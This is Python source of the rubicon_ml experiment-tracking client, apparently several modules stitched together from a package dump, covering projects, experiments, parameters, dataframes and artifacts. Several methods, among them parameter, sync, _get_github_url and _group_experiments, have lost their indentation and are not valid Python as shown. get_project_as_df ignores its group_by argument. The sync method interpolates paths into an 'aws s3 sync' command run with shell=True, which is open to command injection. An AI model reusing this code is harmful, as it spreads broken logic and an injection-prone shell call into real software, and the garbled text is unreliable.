    id : str, optional
        The id of the feature to get.

    Returns
    -------
    rubicon.client.Feature
        The feature with name `name` or id `id`.
    """
    if (name is None and id is None) or (name is not None and id is not None):
        raise ValueError("`name` OR `id` required.")

    if name is not None:
        return_err = None

        for repo in self.repositories:
            try:
                feature = repo.get_feature(self.project.name, self.id, name)
            except Exception as err:
                return_err = err
            else:
                return Feature(feature, self)

        raise RubiconException("all configured storage backends failed") from return_err
    else:
        # raise a clear error instead of an opaque `IndexError` on a miss
        matches = [f for f in self.features() if f.id == id]
        if not matches:
            raise RubiconException(f"No feature with id `{id}` found.")

        return matches[0]
@failsafe
def log_parameter(self, name, value=None, description=None, tags=None):
    """Create a parameter under the experiment.

    Parameters
    ----------
    name : str
        The parameter's name.
    value : object, optional
        The parameter's value. Can be an object of any JSON
        serializable (via rubicon.utils.DomainJSONEncoder)
        type.
    description : str, optional
        The parameter's description. Use to provide
        additional context.
    tags : list of str, optional
        Values to tag the parameter with. Use tags to organize and
        filter your parameters.

    Returns
    -------
    rubicon.client.Parameter
        The created parameter.
    """
    # use `None` as the default to avoid the shared mutable default argument
    if tags is None:
        tags = []
    if not isinstance(tags, list) or not all([isinstance(tag, str) for tag in tags]):
        raise ValueError("`tags` must be `list` of type `str`")

    parameter = domain.Parameter(name, value=value, description=description, tags=tags)

    for repo in self.repositories:
        repo.create_parameter(parameter, self.project.name, self.id)

    return Parameter(parameter, self)
@failsafe
def parameters(self, name=None, tags=[], qtype="or"):
    """Get the parameters logged to this experiment.

    Parameters
    ----------
    name : str, optional
        The name value to filter results on.
    tags : list of str, optional
        The tag values to filter results on.
    qtype : str, optional
        The query type to filter results on. Can be 'or' or
        'and'. Defaults to 'or'.

    Returns
    -------
    list of rubicon.client.Parameter
        The parameters previously logged to this experiment.
    """
    failure = None

    # fall through to the next repository only when the current one errors
    for repo in self.repositories:
        try:
            retrieved = [
                Parameter(parameter, self)
                for parameter in repo.get_parameters(self.project.name, self.id)
            ]
        except Exception as err:
            failure = err

            continue

        self._parameters = filter_children(retrieved, tags, qtype, name)

        return self._parameters

    raise RubiconException("all configured storage backends failed") from failure
@failsafe
def parameter(self, name=None, id=None):
"""Get a parameter.
Parameters
----------
name : str, optional
The name of the parameter to get.
id : str, optional
The id of the parameter to get.
Returns
-------
rubicon.client.Parameter
The parameter with name `name` or id `id`.
"""
if (name is None and id is None) or (name is not None and id is not None):
raise ValueError("`name` OR `id` required.")
if name is not None:
return_err = None
for repo in self.repositories:
try:
parameter = repo.get_parameter(self.project.name, self.id, name)
except Exception as err:
return_err = err
else:
parameter = Parameter(parameter, self)
return parameter
raise RubiconException("all configured storage backends failed") from return_err
else:
parameter = [p for p in self.parameters() if p.id == id][0]
return parameter
    @property
    def id(self):
        """Get the experiment's id."""
        return self._domain.id

    @property
    def name(self):
        """Get the experiment's name."""
        return self._domain.name

    @property
    def description(self):
        """Get the experiment's description."""
        return self._domain.description

    @property
    def model_name(self):
        """Get the experiment's model name."""
        return self._domain.model_name

    @property
    def branch_name(self):
        """Get the experiment's branch name."""
        return self._domain.branch_name

    @property
    def commit_hash(self):
        """Get the experiment's commit hash."""
        return self._domain.commit_hash

    @property
    def training_metadata(self):
        """Get the experiment's training metadata."""
        training_metadata = self._domain.training_metadata.training_metadata
        # unwrap single-element lists so callers get the lone entry directly
        if len(training_metadata) == 1:
            training_metadata = training_metadata[0]

        return training_metadata

    @property
    def created_at(self):
        """Get the time the experiment was created."""
        return self._domain.created_at

    @property
    def project(self):
        """Get the project client object that this experiment
        belongs to.
        """
        return self._parent
from rubicon_ml.client import Base, TagMixin
from rubicon_ml.client.utils.exception_handling import failsafe
from rubicon_ml.exceptions import RubiconException
class Dataframe(Base, TagMixin):
    """A client dataframe.

    A `dataframe` is a two-dimensional, tabular dataset with
    labeled axes (rows and columns) that provides value to the
    model developer and/or reviewer when visualized.

    For example, confusion matrices, feature importance tables
    and marginal residuals can all be logged as a `dataframe`.

    A `dataframe` is logged to a `project` or an `experiment`.

    Parameters
    ----------
    domain : rubicon.domain.Dataframe
        The dataframe domain model.
    parent : rubicon.client.Project or rubicon.client.Experiment
        The project or experiment that the artifact is
        logged to.
    """

    def __init__(self, domain, parent):
        super().__init__(domain, parent._config)

        # cached data, populated lazily by `get_data`
        self._data = None
        self._parent = parent

    @failsafe
    def get_data(self, df_type="pandas"):
        """Loads the data associated with this Dataframe
        into a `pandas` or `dask` dataframe.

        Parameters
        ----------
        df_type : str, optional
            The type of dataframe to return. Valid options include
            ["dask", "pandas"]. Defaults to "pandas".

        Returns
        -------
        pandas.DataFrame or dask.DataFrame
            The dataframe's data.
        """
        project_name, experiment_id = self.parent._get_identifiers()
        return_err = None

        # try each configured backend in order; return from the first that succeeds
        for repo in self.repositories:
            try:
                self._data = repo.get_dataframe_data(
                    project_name,
                    self.id,
                    experiment_id=experiment_id,
                    df_type=df_type,
                )
            except Exception as err:
                return_err = err
            else:
                return self._data

        # consistent with the other client objects: chain the last backend
        # error as the cause rather than stringifying it into the message
        raise RubiconException("all configured storage backends failed") from return_err

    @failsafe
    def plot(self, df_type="pandas", plotting_func=None, **kwargs):
        """Render the dataframe using `plotly.express`.

        Parameters
        ----------
        df_type : str, optional
            The type of dataframe. Can be either `pandas` or `dask`.
            Defaults to 'pandas'.
        plotting_func : function, optional
            The `plotly.express` plotting function used to visualize the
            dataframes. Available options can be found at
            https://plotly.com/python-api-reference/plotly.express.html.
            Defaults to `plotly.express.line`.
        kwargs : dict, optional
            Keyword arguments to be passed to `plotting_func`. Available options
            can be found in the documentation of the individual functions at the
            URL above.

        Examples
        --------
        >>> # Log a line plot
        >>> dataframe.plot(x='Year', y='Number of Subscriptions')

        >>> # Log a bar plot
        >>> import plotly.express as px
        >>> dataframe.plot(plotting_func=px.bar, x='Year', y='Number of Subscriptions')
        """
        # `plotly` is an optional dependency shipped with the `ui` extras
        try:
            import plotly.express as px

            if plotting_func is None:
                plotting_func = px.line
        except ImportError:
            raise RubiconException(
                "`ui` extras are required for plotting. Install with `pip install rubicon-ml[ui]`."
            )

        return plotting_func(self.get_data(df_type=df_type), **kwargs)

    @property
    def id(self):
        """Get the dataframe's id."""
        return self._domain.id

    @property
    def name(self):
        """Get the dataframe's name."""
        return self._domain.name

    @property
    def description(self):
        """Get the dataframe's description."""
        return self._domain.description

    @property
    def created_at(self):
        """Get the time this dataframe was created."""
        return self._domain.created_at

    @property
    def parent(self):
        """Get the dataframe's parent client object."""
        return self._parent
import os
import subprocess
from rubicon_ml.exceptions import RubiconException
from rubicon_ml.repository import LocalRepository, MemoryRepository, S3Repository
class Config:
    """Used to configure `rubicon` client objects.

    Configuration can be specified (in order of precedence) by:

    1. environment variables 'PERSISTENCE' and 'ROOT_DIR'
    2. arguments to `__init__`

    Parameters
    ----------
    persistence : str, optional
        The persistence type. Can be one of ["filesystem", "memory"].
    root_dir : str, optional
        Absolute or relative filepath. Defaults to using the local
        filesystem. Prefix with s3:// to use s3 instead.
    auto_git_enabled : bool, optional
        True to use the `git` command to automatically log relevant repository
        information to projects and experiments logged with this client instance,
        False otherwise. Defaults to False.
    storage_options : dict, optional
        Additional keyword arguments specific to the protocol being chosen. They
        are passed directly to the underlying filesystem class.
    """

    PERSISTENCE_TYPES = ["filesystem", "memory"]
    # maps "<persistence>-<protocol>" keys to repository implementations
    REPOSITORIES = {
        "memory-memory": MemoryRepository,
        "filesystem-local": LocalRepository,
        "filesystem-s3": S3Repository,
    }

    def __init__(
        self, persistence=None, root_dir=None, is_auto_git_enabled=False, **storage_options
    ):
        self.storage_options = storage_options

        # `storage_options` is a kwargs dict, so it can never be `None`;
        # a plain membership test is sufficient
        if "composite_config" in storage_options:
            composite_config = storage_options.get("composite_config")
            repositories = []

            for config in composite_config:
                self.persistence, self.root_dir, self.is_auto_git_enabled = self._load_config(
                    config["persistence"], config["root_dir"], is_auto_git_enabled
                )
                repositories.append(self._get_repository())

            self.repositories = repositories
        else:
            self.persistence, self.root_dir, self.is_auto_git_enabled = self._load_config(
                persistence, root_dir, is_auto_git_enabled
            )
            self.repository = self._get_repository()

    def _check_is_in_git_repo(self):
        """Raise a `RubiconException` if not called from within a `git` repository."""
        if subprocess.run(["git", "rev-parse", "--git-dir"], capture_output=True).returncode != 0:
            raise RubiconException(
                "Not a `git` repo: Failed to locate the '.git' directory in this or any parent directories."
            )

    def _load_config(self, persistence, root_dir, is_auto_git_enabled):
        """Get the configuration values.

        Environment variables 'PERSISTENCE' and 'ROOT_DIR' take precedence
        over the corresponding arguments.
        """
        persistence = os.environ.get("PERSISTENCE", persistence)
        if persistence not in self.PERSISTENCE_TYPES:
            raise ValueError(f"PERSISTENCE must be one of {self.PERSISTENCE_TYPES}.")

        root_dir = os.environ.get("ROOT_DIR", root_dir)
        if root_dir is None and persistence == "filesystem":
            raise ValueError("root_dir cannot be None.")

        if is_auto_git_enabled:
            self._check_is_in_git_repo()

        return (persistence, root_dir, is_auto_git_enabled)

    def _get_protocol(self):
        """Get the file protocol of the configured root directory."""
        if self.persistence == "memory":
            return "memory"
        elif self.persistence == "filesystem":
            if self.root_dir.startswith("s3://"):
                return "s3"
            else:
                return "local"

        return "custom"  # catch-all for external backends

    def _get_repository(self):
        """Get the repository for the configured persistence type."""
        protocol = self._get_protocol()

        repository_key = f"{self.persistence}-{protocol}"
        repository = self.REPOSITORIES.get(repository_key)

        if repository is None:
            raise RubiconException(
                f"{self.__class__.__module__}.{self.__class__.__name__} has no persistence "
                + f"layer for the provided configuration: `persistence`: {self.persistence}, "
                + f"`protocol` (from `root_dir`): {protocol}"
            )

        return repository(root_dir=self.root_dir, **self.storage_options)
import subprocess
import warnings
from rubicon_ml import domain
from rubicon_ml.client import Config, Project
from rubicon_ml.client.utils.exception_handling import failsafe
from rubicon_ml.exceptions import RubiconException
from rubicon_ml.repository.utils import slugify
class Rubicon:
    """The `rubicon` client's entry point.

    Creates a `Config` and injects it into the client level
    objects at run-time.

    Parameters
    ----------
    persistence : str, optional
        The persistence type. Can be one of ["filesystem", "memory"].
        Defaults to "filesystem".
    root_dir : str, optional
        Absolute or relative filepath. Use absolute path for best performance.
        Defaults to the local filesystem. Prefix with s3:// to use s3 instead.
    auto_git_enabled : bool, optional
        True to use the `git` command to automatically log relevant repository
        information to projects and experiments logged with this client instance,
        False otherwise. Defaults to False. Requires running inside a `git`
        repository when enabled.
    storage_options : dict, optional
        Additional keyword arguments specific to the protocol being chosen. They
        are passed directly to the underlying filesystem class.
    """

    def __init__(
        self, persistence="filesystem", root_dir=None, auto_git_enabled=False, **storage_options
    ):
        # all configuration (including repository selection) is delegated to `Config`
        self.config = Config(persistence, root_dir, auto_git_enabled, **storage_options)
    @property
    def repository(self):
        # the primary (or only) configured repository
        return self.config.repository

    @property
    def repositories(self):
        # composite configs expose multiple repositories; standard configs
        # are normalized to a single-element list
        if hasattr(self.config, "repositories"):
            return self.config.repositories
        else:
            return [self.config.repository]

    @repository.setter
    def repository(self, value):
        self.config.repository = value
def _get_github_url(self):
"""Returns the repository URL of the `git` repo it is called from."""
completed_process = subprocess.run(["git", "remote", "-v"], capture_output=True)
remotes = completed_process.stdout.decode("utf8").replace("\t", " ").split("\n")
try:
origin = [remote for remote in remotes if remote.startswith("origin")][0]
github_url = origin.split(" ")[1]
except IndexError:
github_url = None
return github_url
    def _create_project_domain(self, name, description, github_url, training_metadata):
        """Instantiates and returns a project domain object."""
        # auto-detect the GitHub URL from `git remote` when enabled and not given
        if self.config.is_auto_git_enabled and github_url is None:
            github_url = self._get_github_url()

        # wrap raw tuples in the domain-level training metadata container
        if training_metadata is not None:
            training_metadata = domain.utils.TrainingMetadata(training_metadata)

        return domain.Project(
            name,
            description=description,
            github_url=github_url,
            training_metadata=training_metadata,
        )
    @failsafe
    def create_project(self, name, description=None, github_url=None, training_metadata=None):
        """Create a project.

        Parameters
        ----------
        name : str
            The project's name.
        description : str, optional
            The project's description.
        github_url : str, optional
            The URL of the GitHub repository associated with this
            project. If omitted and automatic `git` logging is
            enabled, it will be retrieved via `git remote`.
        training_metadata : tuple or list of tuples, optional
            Metadata associated with the training dataset(s)
            used across each experiment in this project.

        Returns
        -------
        rubicon.client.Project
            The created project.
        """
        project = self._create_project_domain(name, description, github_url, training_metadata)

        # persist the new project to every configured backend
        for repo in self.repositories:
            repo.create_project(project)

        return Project(project, self.config)
    @failsafe
    def get_project(self, name=None, id=None):
        """Get a project.

        Parameters
        ----------
        name : str, optional
            The name of the project to get.
        id : str, optional
            The id of the project to get.

        Returns
        -------
        rubicon.client.Project
            The project with name `name` or id `id`.
        """
        # exactly one identifier must be provided
        if (name is None and id is None) or (name is not None and id is not None):
            raise ValueError("`name` OR `id` required.")

        if name is not None:
            # try each configured backend in order; return from the first success
            return_err = None

            for repo in self.repositories:
                try:
                    project = repo.get_project(name)
                except Exception as err:
                    return_err = err
                else:
                    project = Project(project, self.config)
                    return project

            raise RubiconException("all configured storage backends failed") from return_err
        else:
            # id lookup falls back to listing all projects and filtering
            project = [p for p in self.projects() if p.id == id][0]
            return project
    def get_project_as_dask_df(self, name, group_by=None):
        """DEPRECATED: Available for backwards compatibility."""
        # thin wrapper kept only so existing callers keep working
        warnings.warn(
            "`get_project_as_dask_df` is deprecated and will be removed in a future "
            "release. use `get_project_as_df('name', df_type='dask') instead.",
            DeprecationWarning,
        )

        return self.get_project_as_df(name, df_type="dask", group_by=group_by)
@failsafe
def get_project_as_df(self, name, df_type="pandas", group_by=None):
"""Get a dask or pandas dataframe representation of a project.
Parameters
----------
name : str
The name of the project to get.
df_type : str, optional
The type of dataframe to return. Valid options include
["dask", "pandas"]. Defaults to "pandas".
group_by : str or None, optional
How to group the project's experiments in the returned
DataFrame(s). Valid options include ["commit_hash"].
Returns
-------
pandas.DataFrame or list of pandas.DataFrame or dask.DataFrame or list of dask.DataFrame
If `group_by` is `None`, a dask or pandas dataframe holding the project's
data. Otherwise a list of dask or pandas dataframes holding the project's
data grouped by `group_by`.
"""
project = self.get_project(name)
return project.to_df(df_type=df_type, group_by=None)
    @failsafe
    def get_or_create_project(self, name, **kwargs):
        """Get or create a project.

        Parameters
        ----------
        name : str
            The project's name.
        kwargs : dict
            Additional keyword arguments to be passed to
            `Rubicon.create_project`.

        Returns
        -------
        rubicon.client.Project
            The corresponding project.
        """
        try:
            project = self.get_project(name)
        except RubiconException:
            # no such project — create it instead
            project = self.create_project(name, **kwargs)
        else:  # check for None in case of failure mode being set to "log" or "warn"
            if project is None:
                project = self.create_project(name, **kwargs)

        return project
    @failsafe
    def projects(self):
        """Get a list of available projects.

        Returns
        -------
        list of rubicon.client.Project
            The list of available projects.
        """
        return_err = None

        # try each configured backend in order; return from the first that succeeds
        for repo in self.repositories:
            try:
                projects = [Project(project, self.config) for project in repo.get_projects()]
            except Exception as err:
                return_err = err
            else:
                return projects

        # every backend failed — surface the last error as the cause
        raise RubiconException("all configured storage backends failed") from return_err
@failsafe
def sync(self, project_name, s3_root_dir):
"""Sync a local project to S3.
Parameters
----------
project_name : str
The name of the project to sync.
s3_root_dir : str
The S3 path where the project's data
will be synced.
Notes
-----
Use to backup your local project data to S3, as an alternative to direct S3 logging.
Relies on AWS CLI's sync. Ensure that your credentials are set and that your Proxy
is on.
"""
if self.config.persistence != "filesystem":
raise RubiconException(
"You can't sync projects written to memory. Sync from either local filesystem or S3."
)
project = self.get_project(project_name)
local_path = f"{self.config.root_dir}/{slugify(project.name)}"
cmd = f"aws s3 sync {local_path} {s3_root_dir}/{slugify(project.name)}"
try:
subprocess.run(cmd, shell=True, check=True, capture_output=True)
except subprocess.CalledProcessError as e:
raise RubiconException(e.stderr) | /rubicon_ml-0.4.7-py3-none-any.whl/rubicon_ml/client/rubicon.py | 0.874104 | 0.224459 | rubicon.py | pypi |
import subprocess
import warnings
from typing import List, Optional
import dask.dataframe as dd
import pandas as pd
from rubicon_ml import domain
from rubicon_ml.client import ArtifactMixin, Base, DataframeMixin, Experiment
from rubicon_ml.client.utils.exception_handling import failsafe
from rubicon_ml.client.utils.tags import filter_children
from rubicon_ml.exceptions import RubiconException
class Project(Base, ArtifactMixin, DataframeMixin):
    """A client project.

    A `project` is a collection of `experiments`,
    `dataframes`, and `artifacts` identified by a unique name.

    Parameters
    ----------
    domain : rubicon.domain.Project
        The project domain model.
    config : rubicon.client.Config
        The config, which specifies the underlying repository.
    """

    def __init__(self, domain, config=None):
        super().__init__(domain, config)

        # caches populated lazily by `artifacts`, `dataframes` and `experiments`
        self._artifacts = []
        self._dataframes = []
        self._experiments = []
def _get_branch_name(self):
"""Returns the name of the active branch of the `git` repo
it is called from.
"""
command = ["git", "rev-parse", "--abbrev-ref", "HEAD"]
completed_process = subprocess.run(command, capture_output=True)
return completed_process.stdout.decode("utf8").replace("\n", "")
def _get_commit_hash(self):
"""Returns the hash of the last commit to the active branch
of the `git` repo it is called from.
"""
command = ["git", "rev-parse", "HEAD"]
completed_process = subprocess.run(command, capture_output=True)
return completed_process.stdout.decode("utf8").replace("\n", "")
    def _get_identifiers(self):
        """Get the project's name (projects have no parent experiment id)."""
        return self.name, None
    def _create_experiment_domain(
        self,
        name,
        description,
        model_name,
        branch_name,
        commit_hash,
        training_metadata,
        tags,
    ):
        """Instantiates and returns an experiment domain object."""
        # auto-detect git info via `git rev-parse` when enabled and not given
        if self._config.is_auto_git_enabled:
            if branch_name is None:
                branch_name = self._get_branch_name()
            if commit_hash is None:
                commit_hash = self._get_commit_hash()

        # wrap raw tuples in the domain-level training metadata container
        if training_metadata is not None:
            training_metadata = domain.utils.TrainingMetadata(training_metadata)

        return domain.Experiment(
            project_name=self._domain.name,
            name=name,
            description=description,
            model_name=model_name,
            branch_name=branch_name,
            commit_hash=commit_hash,
            training_metadata=training_metadata,
            tags=tags,
        )
def _group_experiments(self, experiments, group_by=None):
"""Groups experiments by `group_by`. Valid options include ["commit_hash"].
Returns
-------
dict
A dictionary of (group name, DataFrame) key-value pairs.
"""
GROUP_BY_OPTIONS = ["commit_hash"]
if group_by is not None and group_by not in GROUP_BY_OPTIONS:
raise ValueError(f"`group_by` must be one of {GROUP_BY_OPTIONS} or `None`.")
if group_by is not None:
grouped_experiments = {}
if group_by == "commit_hash":
for experiment in experiments:
current_experiments = grouped_experiments.get(experiment.commit_hash, [])
current_experiments.append(experiment)
grouped_experiments[experiment.commit_hash] = current_experiments
else:
grouped_experiments = {None: experiments}
return grouped_experiments
    def to_dask_df(self, group_by=None):
        """DEPRECATED: Available for backwards compatibility."""
        # thin wrapper kept only so existing callers keep working
        warnings.warn(
            "`to_dask_df` is deprecated and will be removed in a future release. "
            "use `to_df(df_type='dask') instead.",
            DeprecationWarning,
        )

        return self.to_df(df_type="dask", group_by=group_by)
    @failsafe
    def to_df(self, df_type="pandas", group_by=None):
        """Loads the project's data into dask or pandas dataframe(s) sorted by
        `created_at`. This includes the experiment details along with parameters
        and metrics.

        Parameters
        ----------
        df_type : str, optional
            The type of dataframe to return. Valid options include
            ["dask", "pandas"]. Defaults to "pandas".
        group_by : str or None, optional
            How to group the project's experiments in the returned
            dataframe(s). Valid options include ["commit_hash"].

        Returns
        -------
        pandas.DataFrame or dask.DataFrame, or dict of them
            If `group_by` is `None`, a single dask or pandas dataframe holding
            the project's data. Otherwise a dict mapping each group value to a
            dask or pandas dataframe holding that group's data.
        """
        DEFAULT_COLUMNS = [
            "id",
            "name",
            "description",
            "model_name",
            "commit_hash",
            "tags",
            "created_at",
        ]

        experiments = self.experiments()
        grouped_experiments = self._group_experiments(experiments, group_by=group_by)

        experiment_dfs = {}
        for group, experiments in grouped_experiments.items():
            experiment_records = []
            # track parameter/metric names so every record shares the same columns
            parameter_names = set()
            metric_names = set()

            for experiment in experiments:
                experiment_record = {
                    "id": experiment.id,
                    "name": experiment.name,
                    "description": experiment.description,
                    "model_name": experiment.model_name,
                    "commit_hash": experiment.commit_hash,
                    "tags": experiment.tags,
                    "created_at": experiment.created_at,
                }

                for parameter in experiment.parameters():
                    experiment_record[f"{parameter.name}"] = parameter.value
                    parameter_names.add(parameter.name)

                for metric in experiment.metrics():
                    experiment_record[f"{metric.name}"] = metric.value
                    metric_names.add(metric.name)

                # TODO - features, artifacts, dataframes represented here?
                experiment_records.append(experiment_record)

            columns = DEFAULT_COLUMNS + list(parameter_names) + list(metric_names)

            df = pd.DataFrame.from_records(experiment_records, columns=columns)
            # most recent experiments first
            df = df.sort_values(by=["created_at"], ascending=False).reset_index(drop=True)

            if df_type == "dask":
                df = dd.from_pandas(df, npartitions=1)

            experiment_dfs[group] = df

        return experiment_dfs if group_by is not None else list(experiment_dfs.values())[0]
    @failsafe
    def log_experiment(
        self,
        name=None,
        description=None,
        model_name=None,
        branch_name=None,
        commit_hash=None,
        training_metadata=None,
        tags=[],
    ):
        """Log a new experiment to this project.

        Parameters
        ----------
        name : str
            The experiment's name.
        description : str, optional
            The experiment's description. Use to provide
            additional context.
        model_name : str, optional
            The experiment's model name. For example, this
            could be the name of the registered model in Model One.
        branch_name : str, optional
            The name of the active branch of the `git` repo this experiment
            is logged from. If omitted and automatic `git` logging is enabled,
            it will be retrieved via `git rev-parse`.
        commit_hash : str, optional
            The hash of the last commit to the active branch of the `git` repo
            this experiment is logged from. If omitted and automatic `git`
            logging is enabled, it will be retrieved via `git rev-parse`.
        training_metadata : tuple or list of tuples, optional
            Metadata associated with the experiment's
            training dataset(s).
        tags : list of str, optional
            Values to tag the experiment with. Use tags to organize and
            filter your experiments. For example, tags could be used
            to differentiate between the type of model or classifier
            used during the experiment (i.e. `linear regression`
            or `random forest`).

        Returns
        -------
        rubicon.client.Experiment
            The created experiment.
        """
        # tags must be a (possibly empty) list of strings
        if not isinstance(tags, list) or not all([isinstance(tag, str) for tag in tags]):
            raise ValueError("`tags` must be `list` of type `str`")

        experiment = self._create_experiment_domain(
            name,
            description,
            model_name,
            branch_name,
            commit_hash,
            training_metadata,
            tags,
        )

        # persist the new experiment to every configured backend
        for repo in self.repositories:
            repo.create_experiment(experiment)

        return Experiment(experiment, self)
    @failsafe
    def experiment(self, id=None, name=None):
        """Get an experiment logged to this project by id or name.

        Parameters
        ----------
        id : str
            The id of the experiment to get.
        name : str
            The name of the experiment to get.

        Returns
        -------
        rubicon.client.Experiment
            The experiment logged to this project with id `id` or name 'name'.
        """
        # exactly one identifier must be provided
        if (name is None and id is None) or (name is not None and id is not None):
            raise ValueError("`name` OR `id` required.")

        if name is not None:
            experiments = [e for e in self.experiments() if e.name == name]

            if len(experiments) == 0:
                raise RubiconException(f"No experiment found with name '{name}'.")
            elif len(experiments) > 1:
                warnings.warn(
                    f"Multiple experiments found with name '{name}'."
                    " Returning most recently logged."
                )

            # NOTE(review): assumes repositories return experiments in logged
            # order, so the last match is the most recent — confirm
            experiment = experiments[-1]

            return experiment
        else:
            # try each configured backend in order; return from the first success
            return_err = None

            for repo in self.repositories:
                try:
                    experiment = Experiment(repo.get_experiment(self.name, id), self)
                except Exception as err:
                    return_err = err
                else:
                    return experiment

            raise RubiconException("all configured storage backends failed") from return_err
    @failsafe
    def experiments(self, tags=[], qtype="or", name=None):
        """Get the experiments logged to this project.

        Parameters
        ----------
        tags : list of str, optional
            The tag values to filter results on.
        qtype : str, optional
            The query type to filter results on. Can be 'or' or
            'and'. Defaults to 'or'.
        name:
            The name of the experiment(s) to filter results on.

        Returns
        -------
        list of rubicon.client.Experiment
            The experiments previously logged to this project.
        """
        return_err = None

        # try each configured backend in order; return from the first that succeeds
        for repo in self.repositories:
            try:
                experiments = [Experiment(e, self) for e in repo.get_experiments(self.name)]
            except Exception as err:
                return_err = err
            else:
                # cache the filtered result on the client object
                self._experiments = filter_children(experiments, tags, qtype, name)
                return self._experiments

        # every backend failed — surface the last error as the cause
        raise RubiconException("all configured storage backends failed") from return_err
    @failsafe
    def dataframes(self, tags=[], qtype="or", recursive=False, name=None):
        """Get the dataframes logged to this project.

        Parameters
        ----------
        tags : list of str, optional
            The tag values to filter results on.
        qtype : str, optional
            The query type to filter results on. Can be 'or' or
            'and'. Defaults to 'or'.
        recursive : bool, optional
            If true, get the dataframes logged to this project's
            experiments as well. Defaults to false.
        name : str
            The name value to filter results on.

        Returns
        -------
        list of rubicon.client.Dataframe
            The dataframes previously logged to this client object.
        """
        # `DataframeMixin.dataframes` populates `self._dataframes` with this
        # project's own dataframes
        super().dataframes(tags=tags, qtype=qtype, name=name)

        if recursive is True:
            # also collect dataframes from every child experiment
            for experiment in self.experiments():
                self._dataframes.extend(experiment.dataframes(tags=tags, qtype=qtype, name=name))

        return self._dataframes
    @failsafe
    def archive(self, experiments: Optional[List[Experiment]] = None, remote_rubicon=None):
        """Archive the experiments logged to this project.

        Parameters
        ----------
        experiments : list of Experiments, optional
            The rubicon.client.Experiment objects to archive. If None all logged experiments are archived.
        remote_rubicon : rubicon_ml.Rubicon object, optional
            The remote Rubicon object with the repository to archive to

        Returns
        -------
        filepath of newly created archive
        """
        if len(self.experiments()) == 0:
            raise ValueError("`project` has no logged `experiments` to archive")

        if experiments is not None:
            if not isinstance(experiments, list) or not all(
                [isinstance(experiment, Experiment) for experiment in experiments]
            ):
                raise ValueError(
                    "`experiments` must be `list` of type `rubicon_ml.client.Experiment`"
                )

        # NOTE(review): archiving uses only the primary repository
        # (`self.repository`), not all configured backends — confirm intended
        if remote_rubicon is not None:
            # local import to avoid a circular dependency with the top-level package
            from rubicon_ml import Rubicon

            if not isinstance(remote_rubicon, Rubicon):
                raise ValueError("`remote_rubicon` must be of type `rubicon_ml.client.Rubicon`")
            else:
                return self.repository._archive(
                    self.name, experiments, remote_rubicon.repository.root_dir
                )
        else:
            return self.repository._archive(self.name, experiments, None)
    @failsafe
    def experiments_from_archive(self, remote_rubicon, latest_only: Optional[bool] = False):
        """Retrieve archived experiments into this project's experiments folder.

        Parameters
        ----------
        remote_rubicon : rubicon_ml.Rubicon object
            The remote Rubicon object with the repository containing archived experiments to read in
        latest_only : bool, optional
            Indicates whether or not experiments should only be read from the latest archive
        """
        # local import to avoid a circular dependency with the top-level package
        from rubicon_ml import Rubicon

        if not isinstance(remote_rubicon, Rubicon):
            raise ValueError("`remote_rubicon` must be of type `rubicon_ml.client.Rubicon`")

        self.repository._experiments_from_archive(
            self.name, remote_rubicon.repository.root_dir, latest_only
        )
    @property
    def name(self):
        """Get the project's name."""
        return self._domain.name

    @property
    def id(self):
        """Get the project's id."""
        return self._domain.id

    @property
    def description(self):
        """Get the project's description."""
        return self._domain.description

    @property
    def github_url(self):
        """Get the project's GitHub repository URL."""
        return self._domain.github_url

    @property
    def training_metadata(self):
        """Get the project's training metadata."""
        training_metadata = self._domain.training_metadata.training_metadata
        # unwrap single-element lists so callers get the lone entry directly
        if len(training_metadata) == 1:
            training_metadata = training_metadata[0]

        return training_metadata

    @property
    def created_at(self):
        """Get the time the project was created."""
        return self._domain.created_at
import os
import pickle
import subprocess
import warnings
from datetime import datetime
import fsspec
from rubicon_ml import client, domain
from rubicon_ml.client.utils.exception_handling import failsafe
from rubicon_ml.client.utils.tags import filter_children
from rubicon_ml.exceptions import RubiconException
class ArtifactMixin:
    """Adds artifact support to a client object."""

    def _validate_data(self, data_bytes, data_file, data_object, data_path, name):
        """Resolve the artifact data inputs down to raw bytes and a name.

        Raises a `RubiconException` if the data to log as
        an artifact is improperly provided.

        Returns
        -------
        tuple of (bytes, str)
            The raw bytes to log and the artifact's name.
        """
        # compare against `None` explicitly so falsy-but-valid inputs
        # (empty bytes, `0`, `False`, ...) are not rejected as missing
        if all(data is None for data in (data_bytes, data_file, data_object, data_path)):
            raise RubiconException(
                "One of `data_bytes`, `data_file`, `data_object` or `data_path` must be provided."
            )

        if name is None:
            if data_path is not None:
                # default the artifact name to the data file's basename
                name = os.path.basename(data_path)
            else:
                raise RubiconException("`name` must be provided if not using `data_path`.")

        if data_bytes is None:
            # precedence when bytes weren't given directly: object > file > path
            if data_object is not None:
                data_bytes = pickle.dumps(data_object)
            else:
                if data_file is not None:
                    f = data_file
                elif data_path is not None:
                    f = fsspec.open(data_path, "rb")

                with f as open_file:
                    data_bytes = open_file.read()

        return data_bytes, name
    @failsafe
    def log_artifact(
        self,
        data_bytes=None,
        data_file=None,
        data_object=None,
        data_path=None,
        name=None,
        description=None,
        tags=[],
    ):
        """Log an artifact to this client object.

        Parameters
        ----------
        data_bytes : bytes, optional
            The raw bytes to log as an artifact.
        data_file : TextIOWrapper, optional
            The open file to log as an artifact.
        data_object : python object, optional
            The python object to log as an artifact.
        data_path : str, optional
            The absolute or relative local path or S3 path
            to the data to log as an artifact. S3 paths
            must be prepended with 's3://'.
        name : str, optional
            The name of the artifact file. Required if
            `data_path` is not provided.
        description : str, optional
            A description of the artifact. Use to provide
            additional context.
        tags : list of str, optional
            Values to tag the experiment with. Use tags to organize and
            filter your artifacts.

        Notes
        -----
        Only one of `data_bytes`, `data_file`, `data_object`, and `data_path`
        should be provided. If more than one is given, the order
        of precedence is `data_bytes`, `data_object`, `data_file`, `data_path`.

        Returns
        -------
        rubicon.client.Artifact
            The new artifact.

        Examples
        --------
        >>> # Log with bytes
        >>> experiment.log_artifact(
        ...     data_bytes=b'hello rubicon!', name='bytes_artifact', description="log artifact from bytes"
        ... )

        >>> # Log with file
        >>> with open('some_relevant_file', 'rb') as f:
        >>>     project.log_artifact(
        ...         data_file=f, name='file_artifact', description="log artifact from file"
        ...     )

        >>> # Log with file path
        >>> experiment.log_artifact(
        ...     data_path="./path/to/artifact.pkl", description="log artifact from file path"
        ... )
        """
        # tags must be a (possibly empty) list of strings
        if not isinstance(tags, list) or not all([isinstance(tag, str) for tag in tags]):
            raise ValueError("`tags` must be `list` of type `str`")

        # normalize whichever data input was given down to raw bytes + a name
        data_bytes, name = self._validate_data(data_bytes, data_file, data_object, data_path, name)

